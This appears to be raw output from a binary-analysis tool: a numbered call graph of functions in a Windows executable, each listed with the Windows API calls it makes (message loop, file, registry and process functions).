98084->98107 98087->98032 98089 31abb 98088->98089 98090 7272d 98088->98090 98091 4fddb 22 API calls 98089->98091 98108 a3209 23 API calls 98090->98108 98093 31ac3 98091->98093 98093->98034 98094 72738 98095->98043 98096->98045 98109 a092a 28 API calls 98096->98109 98098 3a961 22 API calls 98097->98098 98099 313fc 98098->98099 98100 3a961 22 API calls 98099->98100 98101 31404 98100->98101 98102 3a961 22 API calls 98101->98102 98103 313c6 98102->98103 98103->98050 98104->98083 98105->98082 98106->98084 98107->98087 98108->98094 98110 82a00 98124 3d7b0 ISource 98110->98124 98111 3db11 PeekMessageW 98111->98124 98112 3d807 GetInputState 98112->98111 98112->98124 98113 81cbe TranslateAcceleratorW 98113->98124 98115 3db73 TranslateMessage DispatchMessageW 98116 3db8f PeekMessageW 98115->98116 98116->98124 98117 3da04 timeGetTime 98117->98124 98118 3dbaf Sleep 98135 3dbc0 98118->98135 98119 82b74 Sleep 98119->98135 98120 81dda timeGetTime 98231 4e300 23 API calls 98120->98231 98121 4e551 timeGetTime 98121->98135 98124->98111 98124->98112 98124->98113 98124->98115 98124->98116 98124->98117 98124->98118 98124->98119 98124->98120 98127 3d9d5 98124->98127 98142 3dd50 98124->98142 98149 3dfd0 98124->98149 98172 41310 98124->98172 98229 3bf40 235 API calls 2 library calls 98124->98229 98230 4edf6 IsDialogMessageW GetClassLongW 98124->98230 98232 a3a2a 23 API calls 98124->98232 98233 3ec40 98124->98233 98257 a359c 82 API calls __wsopen_s 98124->98257 98125 82c0b GetExitCodeProcess 98129 82c21 WaitForSingleObject 98125->98129 98130 82c37 CloseHandle 98125->98130 98126 c29bf GetForegroundWindow 98126->98135 98129->98124 98129->98130 98130->98135 98131 82a31 98131->98127 98132 82ca9 Sleep 98132->98124 98135->98121 98135->98124 98135->98125 98135->98126 98135->98127 98135->98131 98135->98132 98258 b5658 23 API calls 98135->98258 98259 9e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98135->98259 98260 9d4dc 47 API calls 98135->98260 98143 3dd83 98142->98143 98144 3dd6f 98142->98144 98262 a359c 82 API calls __wsopen_s 98143->98262 98261 3d260 235 API calls 2 library calls 98144->98261 98147 3dd7a 98147->98124 98148 82f75 98148->98148 98150 3e010 98149->98150 98160 3e0dc ISource 98150->98160 98265 50242 5 API calls __Init_thread_wait 98150->98265 98151 3ec40 235 API calls 98151->98160 98154 82fca 98156 3a961 22 API calls 98154->98156 98154->98160 98155 3a961 22 API calls 98155->98160 98158 82fe4 98156->98158 98266 500a3 29 API calls __onexit 98158->98266 98160->98151 98160->98155 98166 3a8c7 22 API calls 98160->98166 98167 404f0 22 API calls 98160->98167 98168 a359c 82 API calls 98160->98168 98169 3e3e1 98160->98169 98263 3a81b 41 API calls 98160->98263 98264 4a308 235 API calls 98160->98264 98268 50242 5 API calls __Init_thread_wait 98160->98268 98269 500a3 29 API calls __onexit 98160->98269 98270 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98160->98270 98271 b47d4 235 API calls 98160->98271 98272 b68c1 235 API calls 98160->98272 98163 82fee 98267 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98163->98267 98166->98160 98167->98160 98168->98160 98169->98124 98173 41376 98172->98173 98174 417b0 98172->98174 98176 41390 98173->98176 98177 86331 98173->98177 98371 50242 5 API calls __Init_thread_wait 98174->98371 98181 41940 9 API calls 98176->98181 98178 8633d 98177->98178 98376 b709c 235 API calls 98177->98376 98178->98124 98180 417ba 98184 39cb3 22 API calls 98180->98184 98188 417fb 98180->98188 98182 413a0 98181->98182 98183 41940 9 API calls 98182->98183 98185 413b6 98183->98185 98186 417d4 98184->98186 98185->98188 98189 413ec 98185->98189 98372 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98186->98372 98187 86346 98377 a359c 82 API calls __wsopen_s 98187->98377 98188->98187 98190 4182c 98188->98190 98189->98187 98212 41408 __fread_nolock 98189->98212 98373 3aceb 23 API calls ISource 98190->98373 98194 41839 98374 4d217 235 API calls 98194->98374 98196 8636e 98378 a359c 82 API calls __wsopen_s 98196->98378 98197 4152f 98199 4153c 98197->98199 98200 863d1 98197->98200 98202 41940 9 API calls 98199->98202 98380 b5745 54 API calls _wcslen 98200->98380 98203 41549 98202->98203 98206 864fa 98203->98206 98208 41940 9 API calls 98203->98208 98204 4fddb 22 API calls 98204->98212 98205 4fe0b 22 API calls 98205->98212 98216 86369 98206->98216 98381 a359c 82 API calls __wsopen_s 98206->98381 98207 41872 98375 4faeb 23 API calls 98207->98375 98214 41563 98208->98214 98211 3ec40 235 API calls 98211->98212 98212->98194 98212->98196 98212->98197 98212->98204 98212->98205 98212->98211 98213 863b2 98212->98213 98212->98216 98379 a359c 82 API calls __wsopen_s 98213->98379 98214->98206 98217 3a8c7 22 API calls 98214->98217 98219 415c7 ISource 98214->98219 98216->98124 98217->98219 98218 41940 9 API calls 98218->98219 98219->98206 98219->98207 98219->98216 98219->98218 98222 4167b ISource 98219->98222 98227 34f39 68 API calls 98219->98227 98273 a6ef1 98219->98273 98353 b958b 98219->98353 98356 b9c4d 98219->98356 98364 b959f 98219->98364 98367 9d4ce 98219->98367 98220 4171d 98220->98124 98222->98220 98370 4ce17 22 API calls ISource 98222->98370 98227->98219 98229->98124 98230->98124 98231->98124 98232->98124 98253 3ec76 ISource 98233->98253 98235 3fef7 98241 3a8c7 22 API calls 98235->98241 98249 3ed9d ISource 98235->98249 98236 4fddb 22 API calls 98236->98253 98238 84b0b 98827 a359c 82 API calls __wsopen_s 98238->98827 98239 84600 98246 3a8c7 22 API calls 98239->98246 98239->98249 98241->98249 98244 50242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98244->98253 98245 3a8c7 22 API calls 98245->98253 98246->98249 98247 3fbe3 98247->98249 98250 84bdc 98247->98250 98256 3f3ae ISource 98247->98256 98248 3a961 22 API calls 98248->98253 98249->98124 98828 a359c 82 API calls __wsopen_s 98250->98828 98251 500a3 29 API calls pre_c_initialization 98251->98253 98253->98235 98253->98236 98253->98238 98253->98239 98253->98244 98253->98245 98253->98247 98253->98248 98253->98249 98253->98251 98254 84beb 98253->98254 98255 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98253->98255 98253->98256 98824 401e0 235 API calls 2 library calls 98253->98824 98825 406a0 41 API calls ISource 98253->98825 98829 a359c 82 API calls __wsopen_s 98254->98829 98255->98253 98256->98249 98826 a359c 82 API calls __wsopen_s 98256->98826 98257->98124 98258->98135 98259->98135 98260->98135 98261->98147 98262->98148 98263->98160 98264->98160 98265->98154 98266->98163 98267->98160 98268->98160 98269->98160 98270->98160 98271->98160 98272->98160 98274 3a961 22 API calls 98273->98274 98275 a6f1d 98274->98275 98276 3a961 22 API calls 98275->98276 98277 a6f26 98276->98277 98278 a6f3a 98277->98278 98559 3b567 39 API calls 98277->98559 98382 37510 98278->98382 98281 a70bf 98283 34ecb 94 API calls 98281->98283 98282 a6fbc 98284 37510 53 API calls 98282->98284 98285 a70d0 98283->98285 98287 a6fc8 98284->98287 98288 a70e5 98285->98288 98290 34ecb 94 API calls 98285->98290 98286 a6f57 _wcslen 98286->98281 98286->98282 98352 a70e9 98286->98352 98289 3a8c7 22 API calls 98287->98289 98294 a6fdb 98287->98294 98291 3a961 22 API calls 98288->98291 98288->98352 98289->98294 98290->98288 98292 a711a 98291->98292 98293 3a961 22 API calls 98292->98293 98296 a7126 98293->98296 98295 a7027 98294->98295 98297 a7005 98294->98297 98300 3a8c7 22 API calls 98294->98300 98298 37510 53 API calls 98295->98298 98299 3a961 22 API calls 98296->98299 98301 333c6 22 API calls 98297->98301 98302 a7034 98298->98302 98305 a712f 98299->98305 98300->98297 98306 a700f 98301->98306 98303 a703d 98302->98303 98304 a7047 98302->98304 98307 3a8c7 22 API calls 98303->98307 98560 9e199 GetFileAttributesW 98304->98560 98309 3a961 22 API calls 98305->98309 98310 37510 53 API calls 98306->98310 98307->98304 98312 a7138 98309->98312 98313 a701b 98310->98313 98311 a7050 98314 a7063 98311->98314 98317 34c6d 22 API calls 98311->98317 98315 37510 53 API calls 98312->98315 98316 36350 22 API calls 98313->98316 98319 37510 53 API calls 98314->98319 98324 a7069 98314->98324 98318 a7145 98315->98318 98316->98295 98317->98314 98405 3525f 98318->98405 98321 a70a0 98319->98321 98561 9d076 57 API calls 98321->98561 98322 a7166 98447 34c6d 98322->98447 98324->98352 98327 a71a9 98328 3a8c7 22 API calls 98327->98328 98330 a71ba 98328->98330 98329 34c6d 22 API calls 98331 a7186 98329->98331 98332 36350 22 API calls 98330->98332 98331->98327 98333 36b57 22 API calls 98331->98333 98334 a71c8 98332->98334 98335 a719b 98333->98335 98336 36350 22 API calls 98334->98336 98337 36b57 22 API calls 98335->98337 98338 a71d6 98336->98338 98337->98327 98339 36350 22 API calls 98338->98339 98340 a71e4 98339->98340 98341 37510 53 API calls 98340->98341 98342 a71f0 98341->98342 98450 9d7bc 98342->98450 98344 a7201 98345 9d4ce 4 API calls 98344->98345 98346 a720b 98345->98346 98347 37510 53 API calls 98346->98347 98351 a7239 98346->98351 98348 a7229 98347->98348 98504 a2947 98348->98504 98350 34f39 68 API calls 98350->98352 98351->98350 98352->98219 98589 b7f59 98353->98589 98355 b959b 98355->98219 98357 b9ca8 98356->98357 98363 b9c68 98356->98363 98360 b9cc6 98357->98360 98713 3b567 39 API calls 98357->98713 98361 b9d23 98360->98361 98360->98363 98714 3b567 39 API calls 98360->98714 98681 9f9b8 98361->98681 98363->98219 98365 b7f59 120 API calls 98364->98365 98366 b95af 98365->98366 98366->98219 98819 9dbbe lstrlenW 98367->98819 98370->98222 98371->98180 98372->98188 98373->98194 98374->98207 98375->98207 98376->98178 98377->98216 98378->98216 98379->98216 98380->98214 98381->98216 98383 37525 98382->98383 98398 37522 98382->98398 98384 3755b 98383->98384 98385 3752d 98383->98385 98388 7500f 98384->98388 98389 3756d 98384->98389 98396 750f6 98384->98396 98562 551c6 26 API calls 98385->98562 98399 4fe0b 22 API calls 98388->98399 98404 75088 98388->98404 98563 4fb21 51 API calls 98389->98563 98390 3753d 98394 4fddb 22 API calls 98390->98394 98391 7510e 98391->98391 98395 37547 98394->98395 98397 39cb3 22 API calls 98395->98397 98565 55183 26 API calls 98396->98565 98397->98398 98398->98286 98400 75058 98399->98400 98401 4fddb 22 API calls 98400->98401 98402 7507f 98401->98402 98403 39cb3 22 API calls 98402->98403 98403->98404 98564 4fb21 51 API calls 98404->98564 98406 3a961 22 API calls 98405->98406 98407 35275 98406->98407 98408 3a961 22 API calls 98407->98408 98409 3527d 98408->98409 98410 3a961 22 API calls 98409->98410 98411 35285 98410->98411 98412 3a961 22 API calls 98411->98412 98413 3528d 98412->98413 98414 73df5 98413->98414 98415 352c1 98413->98415 98416 3a8c7 22 API calls 98414->98416 98417 36d25 22 API calls 98415->98417 98418 73dfe 98416->98418 98419 352cf 98417->98419 98420 3a6c3 22 API calls 98418->98420 98421 393b2 22 API calls 98419->98421 98422 35304 98420->98422 98423 352d9 98421->98423 98428 35325 98422->98428 98437 73e20 98422->98437 98440 35349 98422->98440 98423->98422 98424 36d25 22 API calls 98423->98424 98426 352fa 98424->98426 98427 393b2 22 API calls 98426->98427 98427->98422 98431 34c6d 22 API calls 98428->98431 98428->98440 98429 3535a 98430 35370 98429->98430 98435 3a8c7 22 API calls 98429->98435 98432 35384 98430->98432 98438 3a8c7 22 API calls 98430->98438 98433 35332 98431->98433 98436 3538f 98432->98436 98441 3a8c7 22 API calls 98432->98441 98439 36d25 22 API calls 98433->98439 98433->98440 98434 36b57 22 API calls 98444 73ee0 98434->98444 98435->98430 98442 3a8c7 22 API calls 98436->98442 98445 3539a 98436->98445 98437->98434 98438->98432 98439->98440 98566 36d25 98440->98566 98441->98436 98442->98445 98443 34c6d 22 API calls 98443->98444 98444->98440 98444->98443 98579 349bd 22 API calls __fread_nolock 98444->98579 98445->98322 98448 3aec9 22 API calls 98447->98448 98449 34c78 98448->98449 98449->98327 98449->98329 98451 9d7d8 98450->98451 98452 9d7dd 98451->98452 98453 9d7f3 98451->98453 98454 9d7ee 98452->98454 98456 3a8c7 22 API calls 98452->98456 98455 3a961 22 API calls 98453->98455 98454->98344 98457 9d7fb 98455->98457 98456->98454 98458 3a961 22 API calls 98457->98458 98459 9d803 98458->98459 98460 3a961 22 API calls 98459->98460 98461 9d80e 98460->98461 98462 3a961 22 API calls 98461->98462 98463 9d816 98462->98463 98464 3a961 22 API calls 98463->98464 98465 9d81e 98464->98465 98466 3a961 22 API calls 98465->98466 98467 9d826 98466->98467 98468 3a961 22 API calls 98467->98468 98469 9d82e 98468->98469 98470 3a961 22 API calls 98469->98470 98471 9d836 98470->98471 98472 3525f 22 API calls 98471->98472 98473 9d84d 98472->98473 98474 3525f 22 API calls 98473->98474 98475 9d866 98474->98475 98476 34c6d 22 API calls 98475->98476 98477 9d872 98476->98477 98478 9d885 98477->98478 98479 393b2 22 API calls 98477->98479 98480 34c6d 22 API calls 98478->98480 98479->98478 98481 9d88e 98480->98481 98482 9d89e 98481->98482 98483 393b2 22 API calls 98481->98483 98484 9d8b0 98482->98484 98485 3a8c7 22 API calls 98482->98485 98483->98482 98486 36350 22 API calls 98484->98486 98485->98484 98487 9d8bb 98486->98487 98581 9d978 22 API calls 98487->98581 98489 9d8ca 98582 9d978 22 API calls 98489->98582 98491 9d8dd 98492 34c6d 22 API calls 98491->98492 98493 9d8e7 98492->98493 98494 9d8ec 98493->98494 98495 9d8fe 98493->98495 98496 333c6 22 API calls 98494->98496 98497 34c6d 22 API calls 98495->98497 98498 9d8f9 98496->98498 98499 9d907 98497->98499 98502 36350 22 API calls 98498->98502 98500 9d925 98499->98500 98501 333c6 22 API calls 98499->98501 98503 36350 22 API calls 98500->98503 98501->98498 98502->98500 98503->98454 98505 a2954 __wsopen_s 98504->98505 98506 4fe0b 22 API calls 98505->98506 98507 a2971 98506->98507 98508 35722 22 API calls 98507->98508 98509 a297b 98508->98509 98510 a274e 27 API calls 98509->98510 98511 a2986 98510->98511 98512 3511f 64 API calls 98511->98512 98513 a299b 98512->98513 98514 a29bf 98513->98514 98515 a2a6c 98513->98515 98516 a2e66 75 API calls 98514->98516 98517 a2e66 75 API calls 98515->98517 98518 a29c4 98516->98518 98520 a2a38 98517->98520 98524 a2a75 ISource 98518->98524 98587 5d583 26 API calls 98518->98587 98521 350f5 40 API calls 98520->98521 98520->98524 98522 a2a91 98521->98522 98523 350f5 40 API calls 98522->98523 98526 a2aa1 98523->98526 98524->98351 98525 a29ed 98588 5d583 26 API calls 98525->98588 98527 350f5 40 API calls 98526->98527 98529 a2abc 98527->98529 98530 350f5 40 API calls 98529->98530 98531 a2acc 98530->98531 98532 350f5 40 API calls 98531->98532 98533 a2ae7 98532->98533 98534 350f5 40 API calls 98533->98534 98535 a2af7 98534->98535 98536 350f5 40 API calls 98535->98536 98537 a2b07 98536->98537 98538 350f5 40 API calls 98537->98538 98539 a2b17 98538->98539 98583 a3017 GetTempPathW GetTempFileNameW 98539->98583 98541 a2b22 98542 5e5eb 29 API calls 98541->98542 98553 a2b33 98542->98553 98543 a2bed 98544 5e678 67 API calls 98543->98544 98545 a2bf8 98544->98545 98547 a2bfe DeleteFileW 98545->98547 98548 a2c12 98545->98548 98546 350f5 40 API calls 98546->98553 98547->98524 98549 a2c91 CopyFileW 98548->98549 98555 a2c18 98548->98555 98550 a2cb9 DeleteFileW 98549->98550 98551 a2ca7 DeleteFileW 98549->98551 98584 a2fd8 CreateFileW 98550->98584 98551->98524 98553->98524 98553->98543 98553->98546 98554 5dbb3 65 API calls 98553->98554 98554->98553 98556 a22ce 79 API calls 98555->98556 98557 a2c7c 98556->98557 98557->98550 98558 a2c80 DeleteFileW 98557->98558 98558->98524 98559->98278 98560->98311 98561->98324 98562->98390 98563->98390 98564->98396 98565->98391 98567 36d91 98566->98567 98568 36d34 98566->98568 98569 393b2 22 API calls 98567->98569 98568->98567 98570 36d3f 98568->98570 98571 36d62 __fread_nolock 98569->98571 98572 36d5a 98570->98572 98573 74c9d 98570->98573 98571->98429 98580 36f34 22 API calls 98572->98580 98575 4fddb 22 API calls 98573->98575 98576 74ca7 98575->98576 98577 4fe0b 22 API calls 98576->98577 98578 74cda 98577->98578 98579->98444 98580->98571 98581->98489 98582->98491 98583->98541 98585 a2fff SetFileTime CloseHandle 98584->98585 98586 a3013 98584->98586 98585->98586 98586->98524 98587->98525 98588->98520 98590 37510 53 API calls 98589->98590 98591 b7f90 98590->98591 98612 b7fd5 ISource 98591->98612 98627 b8cd3 98591->98627 98593 b8281 98594 b844f 98593->98594 98599 b828f 98593->98599 98668 b8ee4 60 API calls 98594->98668 98597 b845e 98598 b846a 98597->98598 98597->98599 98598->98612 98640 b7e86 98599->98640 98600 37510 53 API calls 98617 b8049 98600->98617 98605 b82c8 98655 4fc70 98605->98655 98608 b82e8 98661 a359c 82 API calls __wsopen_s 98608->98661 98609 b8302 98662 363eb 22 API calls 98609->98662 98612->98355 98613 b82f3 GetCurrentProcess TerminateProcess 98613->98609 98614 b8311 98663 36a50 22 API calls 98614->98663 98616 b832a 98625 b8352 98616->98625 98664 404f0 22 API calls 98616->98664 98617->98593 98617->98600 98617->98612 98659 9417d 22 API calls __fread_nolock 98617->98659 98660 b851d 42 API calls _strftime 98617->98660 98619 b84c5 98619->98612 98623 b84d9 FreeLibrary 98619->98623 98620 b8341 98665 b8b7b 75 API calls 98620->98665 98623->98612 98625->98619 98666 404f0 22 API calls 98625->98666 98667 3aceb 23 API calls ISource 98625->98667 98669 b8b7b 75 API calls 98625->98669 98628 3aec9 22 API calls 98627->98628 98629 b8cee CharLowerBuffW 98628->98629 98670 98e54 98629->98670 98633 3a961 22 API calls 98634 b8d2a 98633->98634 98635 36d25 22 API calls 98634->98635 98636 b8d3e 98635->98636 98637 393b2 22 API calls 98636->98637 98639 b8d48 _wcslen 98637->98639 98638 b8e5e _wcslen 98638->98617 98639->98638 98677 b851d 42 API calls _strftime 98639->98677 98641 b7eec 98640->98641 98642 b7ea1 98640->98642 98646 b9096 98641->98646 98643 4fe0b 22 API calls 98642->98643 98644 b7ec3 98643->98644 98644->98641 98645 4fddb 22 API calls 98644->98645 98645->98644 98647 b92ab ISource 98646->98647 98654 b90ba _strcat _wcslen 98646->98654 98647->98605 98648 3b567 39 API calls 98648->98654 98649 3b38f 39 API calls 98649->98654 98650 3b6b5 39 API calls 98650->98654 98651 37510 53 API calls 98651->98654 98652 5ea0c 21 API calls ___std_exception_copy 98652->98654 98654->98647 98654->98648 98654->98649 98654->98650 98654->98651 98654->98652 98680 9efae 24 API calls _wcslen 98654->98680 98656 4fc85 98655->98656 98657 4fd1d VirtualAlloc 98656->98657 98658 4fceb 98656->98658 98657->98658 98658->98608 98658->98609 98659->98617 98660->98617 98661->98613 98662->98614 98663->98616 98664->98620 98665->98625 98666->98625 98667->98625 98668->98597 98669->98625 98671 98e74 _wcslen 98670->98671 98672 98f63 98671->98672 98674 98ea9 98671->98674 98676 98f68 98671->98676 98672->98633 98672->98639 98674->98672 98678 4ce60 41 API calls 98674->98678 98676->98672 98679 4ce60 41 API calls 98676->98679 98677->98638 98678->98674 98679->98676 98680->98654 98715 9f8f0 98681->98715 98684 9fa39 98722 9fc2f 98684->98722 98685 9fa51 98687 9fab7 98685->98687 98690 9fa61 98685->98690 98688 9fb4d 98687->98688 98689 9fae7 98687->98689 98706 9f9df __fread_nolock 98687->98706 98693 9fbf6 98688->98693 98694 9fb56 98688->98694 98691 9faec 98689->98691 98692 9fb17 98689->98692 98712 9fa99 98690->98712 98778 a1e96 24 API calls 98690->98778 98691->98706 98782 3b6b5 39 API calls 98691->98782 98692->98706 98783 3b6b5 39 API calls 98692->98783 98693->98706 98787 3b38f 39 API calls 98693->98787 98695 9fb5b 98694->98695 98696 9fbd3 98694->98696 98698 9fb9a 98695->98698 98699 9fb61 98695->98699 98696->98706 98786 3b38f 39 API calls 98696->98786 98698->98706 98785 3b38f 39 API calls 98698->98785 98699->98706 98784 3b38f 39 API calls 98699->98784 98700 9fa6d 98779 a1e96 24 API calls 98700->98779 98706->98363 98710 9fa84 __fread_nolock 98780 a1e96 24 API calls 98710->98780 98781 a0e85 22 API calls ___scrt_fastfail 98712->98781 98713->98360 98714->98361 98716 9f93d 98715->98716 98720 9f901 98715->98720 98789 3b567 39 API calls 98716->98789 98718 9f93b 98718->98684 98718->98685 98718->98706 98719 37510 53 API calls 98719->98720 98720->98718 98720->98719 98788 54a28 40 API calls 2 library calls 98720->98788 98723 9fda3 98722->98723 98724 9fc43 98722->98724 98725 3a961 22 API calls 98723->98725 98724->98723 98726 9fc4d 98724->98726 98727 9fdab 98725->98727 98728 9fd1a 98726->98728 98729 9fc63 98726->98729 98736 9fdb1 98727->98736 98740 9fe20 __fread_nolock 98727->98740 98731 9fd5d 98728->98731 98732 9fd1e 98728->98732 98730 3a961 22 API calls 98729->98730 98734 9fc6b 98730->98734 98733 4fe0b 22 API calls 98731->98733 98735 4fe0b 22 API calls 98732->98735 98737 9fd76 __fread_nolock 98733->98737 98738 37510 53 API calls 98734->98738 98739 9fd27 __fread_nolock 98735->98739 98741 9fdc9 98736->98741 98742 9fdbf 98736->98742 98753 39c6e 22 API calls 98737->98753 98743 9fc75 98738->98743 98790 9ebd1 98739->98790 98817 9f24a 22 API calls 98740->98817 98745 37510 53 API calls 98741->98745 98814 3b567 39 API calls 98742->98814 98746 9fcd9 98743->98746 98747 9fc81 98743->98747 98752 9fdc4 98745->98752 98750 9fce6 98746->98750 98756 37510 53 API calls 98746->98756 98748 9fc8c 98747->98748 98754 37510 53 API calls 98747->98754 98757 37510 53 API calls 98748->98757 98759 37510 53 API calls 98750->98759 98815 9f24a 22 API calls 98752->98815 98776 9fcbf __fread_nolock 98753->98776 98754->98748 98756->98750 98761 9fc9a 98757->98761 98758 9fe5e 98818 362b5 22 API calls 98758->98818 98763 9fcf4 98759->98763 98766 36d25 22 API calls 98761->98766 98767 36d25 22 API calls 98763->98767 98765 9fddf 98816 362b5 22 API calls 98765->98816 98769 9fca8 98766->98769 98770 9fd02 98767->98770 98811 362b5 22 API calls 98769->98811 98813 362b5 22 API calls 98770->98813 98771 9fdeb 98774 34c6d 22 API calls 98771->98774 98774->98776 98775 9fcb4 98812 9efae 24 API calls _wcslen 98775->98812 98776->98706 98778->98700 98779->98710 98780->98712 98781->98706 98782->98706 98783->98706 98784->98706 98785->98706 98786->98706 98787->98706 98788->98720 98789->98718 98791 9ec37 98790->98791 98793 9ebe0 _strlen 98790->98793 98797 39c6e 98791->98797 98792 9ebef MultiByteToWideChar 98792->98791 98794 9ec04 98792->98794 98793->98792 98795 4fe0b 22 API calls 98794->98795 98796 9ec20 MultiByteToWideChar 98795->98796 98796->98791 98798 7f545 98797->98798 98799 39c7e 98797->98799 98800 7f556 98798->98800 98801 36b57 22 API calls 98798->98801 98804 4fddb 22 API calls 98799->98804 98802 3a6c3 22 API calls 98800->98802 98801->98800 98803 7f560 98802->98803 98803->98803 98805 39c91 98804->98805 98806 39c9a 98805->98806 98807 39cac 98805->98807 98808 39cb3 22 API calls 98806->98808 98809 3a961 22 API calls 98807->98809 98810 39ca2 98808->98810 98809->98810 98810->98776 98811->98775 98812->98776 98813->98776 98814->98752 98815->98765 98816->98771 98817->98758 98818->98776 98820 9dbdc GetFileAttributesW 98819->98820 98821 9d4d5 98819->98821 98820->98821 98822 9dbe8 FindFirstFileW 98820->98822 98821->98219 98822->98821 98823 9dbf9 FindClose 98822->98823 98823->98821 98824->98253 98825->98253 98826->98249 98827->98249 98828->98254 98829->98249 98830 31cad SystemParametersInfoW 98831 31033 98836 34c91 98831->98836 98835 31042 98837 3a961 22 API calls 98836->98837 98838 34cff 98837->98838 98844 33af0 98838->98844 98840 34d9c 98842 31038 98840->98842 98847 351f7 22 API calls __fread_nolock 98840->98847 98843 500a3 29 API calls __onexit 98842->98843 98843->98835 98848 33b1c 98844->98848 98847->98840 98849 33b0f 98848->98849 98850 33b29 98848->98850 98849->98840 98850->98849 98851 33b30 RegOpenKeyExW 98850->98851 98851->98849 98852 33b4a RegQueryValueExW 98851->98852 98853 33b80 RegCloseKey 98852->98853 98854 33b6b 98852->98854 98853->98849 98854->98853 98855 32e37 98856 3a961 22 API calls 98855->98856 98857 32e4d 98856->98857 98934 34ae3 98857->98934 98859 32e6b 98860 33a5a 24 API calls 98859->98860 98861 32e7f 98860->98861 98862 39cb3 22 API calls 98861->98862 98863 32e8c 98862->98863 98864 34ecb 94 API calls 98863->98864 98865 32ea5 98864->98865 98866 72cb0 98865->98866 98867 32ead 98865->98867 98868 a2cf9 80 API calls 98866->98868 98871 3a8c7 22 API calls 98867->98871 98869 72cc3 98868->98869 98870 72ccf 98869->98870 98872 34f39 68 API calls 98869->98872 98875 34f39 68 API calls 98870->98875 98873 32ec3 98871->98873 98872->98870 98948 36f88 22 API calls 98873->98948 98877 72ce5 98875->98877 98876 32ecf 98878 39cb3 22 API calls 98876->98878 98964 33084 22 API calls 98877->98964 98879 32edc 98878->98879 98949 3a81b 41 API calls 98879->98949 98881 32eec 98884 39cb3 22 API calls 98881->98884 98883 72d02 98965 33084 22 API calls 98883->98965 98886 32f12 98884->98886 98950 3a81b 41 API calls 98886->98950 98887 72d1e 98889 33a5a 24 API calls 98887->98889 98890 72d44 98889->98890 98966 33084 22 API calls 98890->98966 98891 32f21 98894 3a961 22 API calls 98891->98894 98893 72d50 98895 3a8c7 22 API calls 98893->98895 98896 32f3f 98894->98896 98897 72d5e 98895->98897 98951 33084 22 API calls 98896->98951 98967 33084 22 API calls 98897->98967 98899 32f4b 98952 54a28 40 API calls 2 library calls 98899->98952 98902 72d6d 98906 3a8c7 22 API calls 98902->98906 98903 32f59 98903->98877 98904 32f63 98903->98904 98953 54a28 40 API calls 2 library calls 98904->98953 98907 72d83 98906->98907 98968 33084 22 API calls 98907->98968 98908 32f6e 98908->98883 98910 32f78 98908->98910 98954 54a28 40 API calls 2 library calls 98910->98954 98911 72d90 98913 32f83 98913->98887 98914 32f8d 98913->98914 98955 54a28 40 API calls 2 library calls 98914->98955 98916 32f98 98917 32fdc 98916->98917 98956 33084 22 API calls 98916->98956 98917->98902 98918 32fe8 98917->98918 98918->98911 98958 363eb 22 API calls 98918->98958 98920 32fbf 98922 3a8c7 22 API calls 98920->98922 98924 32fcd 98922->98924 98923 32ff8 98959 36a50 22 API calls 98923->98959 98957 33084 22 API calls 98924->98957 98927 33006 98960 370b0 23 API calls 98927->98960 98931 33021 98932 33065 98931->98932 98961 36f88 22 API calls 98931->98961 98962 370b0 23 API calls 98931->98962 98963 33084 22 API calls 98931->98963 98935 34af0 __wsopen_s 98934->98935 98936 36b57 22 API calls 98935->98936 98937 34b22 98935->98937 98936->98937 98938 34c6d 22 API calls 98937->98938 98947 34b58 98937->98947 98938->98937 98939 39cb3 22 API calls 98941 34c52 98939->98941 98940 39cb3 22 API calls 98940->98947 98942 3515f 22 API calls 98941->98942 98945 34c5e 98942->98945 98943 34c6d 22 API calls 98943->98947 98944 3515f 22 API calls 98944->98947 98945->98859 98946 34c29 98946->98939 98946->98945 98947->98940 98947->98943 98947->98944 98947->98946 98948->98876 98949->98881 98950->98891 98951->98899 98952->98903 98953->98908 98954->98913 98955->98916 98956->98920 98957->98917 98958->98923 98959->98927 98960->98931 98961->98931 98962->98931 98963->98931 98964->98883 98965->98887 98966->98893 98967->98902 98968->98911 98969 33156 98972 33170 98969->98972 98973 33187 98972->98973 98974 331eb 98973->98974 98975 3318c 98973->98975 99011 331e9 98973->99011 98979 331f1 98974->98979 98980 72dfb 98974->98980 98976 33265 PostQuitMessage 98975->98976 98977 33199 98975->98977 99014 3316a 98976->99014 98982 331a4 98977->98982 98983 72e7c 98977->98983 98978 331d0 DefWindowProcW 98978->99014 98984 331f8 98979->98984 98985 3321d SetTimer RegisterWindowMessageW 98979->98985 99021 318e2 10 API calls 98980->99021 98987 331ae 98982->98987 98988 72e68 98982->98988 99026 9bf30 34 API calls ___scrt_fastfail 98983->99026 98991 33201 KillTimer 98984->98991 98992 72d9c 98984->98992 98989 33246 CreatePopupMenu 98985->98989 98985->99014 98986 72e1c 99022 4e499 42 API calls 98986->99022 98996 72e4d 98987->98996 98997 331b9 98987->98997 99025 9c161 27 API calls ___scrt_fastfail 98988->99025 98989->99014 99017 330f2 Shell_NotifyIconW ___scrt_fastfail 98991->99017 98999 72dd7 MoveWindow 98992->98999 99000 72da1 98992->99000 98996->98978 99024 90ad7 22 API calls 98996->99024 99003 331c4 98997->99003 99004 33253 98997->99004 98998 72e8e 98998->98978 98998->99014 98999->99014 99005 72da7 99000->99005 99006 72dc6 SetFocus 99000->99006 99001 33214 99018 33c50 DeleteObject DestroyWindow 99001->99018 99002 33263 99002->99014 99003->98978 99023 330f2 Shell_NotifyIconW ___scrt_fastfail 99003->99023 99019 3326f 44 API calls ___scrt_fastfail 99004->99019 99005->99003 99010 72db0 99005->99010 99006->99014 99020 318e2 10 API calls 99010->99020 99011->98978 99015 72e41 99016 33837 49 API calls 99015->99016 99016->99011 99017->99001 99018->99014 99019->99002 99020->99014 99021->98986 99022->99003 99023->99015 99024->99011 99025->99002 99026->98998 99027 3105b 99032 3344d 99027->99032 99029 3106a 99063 500a3 29 API calls __onexit 99029->99063 99031 31074 99033 3345d __wsopen_s 99032->99033 99034 3a961 22 API calls 99033->99034 99035 33513 99034->99035 99036 33a5a 24 API calls 99035->99036 99037 3351c 99036->99037 99064 33357 99037->99064 99040 333c6 22 API calls 99041 33535 99040->99041 99042 3515f 22 API calls 99041->99042 99043 33544 99042->99043 99044 